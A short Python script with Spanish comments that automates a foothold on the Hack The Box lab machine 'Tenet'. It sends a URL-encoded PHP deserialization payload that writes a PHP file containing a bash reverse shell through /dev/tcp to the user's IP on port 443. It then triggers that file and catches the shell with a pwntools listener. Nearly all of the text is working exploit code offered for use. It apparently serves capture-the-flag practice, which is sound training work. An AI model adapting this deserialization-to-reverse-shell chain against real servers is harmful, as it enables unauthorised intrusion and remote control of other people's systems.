auto_shell_tenet.py

1. #!/usr/bin/python3
2.  
3. #Script que automatiza la intrusion como www-data en la maquina Tenet de HTB
4. #Solo teneis que cambiar la IP
5.  
6. import requests
7. import sys
8. import time
9. import threading
10. from pwn import *
11.  
12.  
13. #Variables
14. IP = "10.10.16.198" # <= Cambiar IP
15. url_main = "http://10.10.10.223/sator.php/?arepo="
16. url_shell = "http://10.10.10.223/tukurce.php"
17. payload = "O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A11%3A%22tukurce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A73%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F"
18. payload2 = "%2F443+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D"
19. lport = 443
20. #Funciones
21. def obtainShell():
22.    
23.     try:
24.         s = requests.Session()
25.         r = s.get(url_main+payload+IP+payload2)
26.         p1 = log.progress("\n[*]Ejecutando PHP Deserialization\n")
27.         time.sleep(2)
28.         p1.status("\nEnviando el payload malicioso...\n")
29.         r = s.get(url_shell)
30.  
31.     except Exception as e:
32.         print(e)
33.  
34. if __name__ == '__main__':
35.     try:
36.         threading.Thread(target=obtainShell).start()
37.     except Exception as e:
38.         log.error(str(e))
39.  
40.     shell = listen(lport, timeout=5).wait_for_connection()
41.  
42.     if shell.sock is None:
43.         log.failure("No se ha podido entrablar conexion")
44.         sys.exit()
45.     else:
46.         log.success("\n ✔️  Se ha obtenido una shell ✔️ \n")
47.         time.sleep(1)
48.         log.info("\nAcceso como www-data\n")
49.         time.sleep(1)
50.  
51.     shell.interactive()
52.  
53.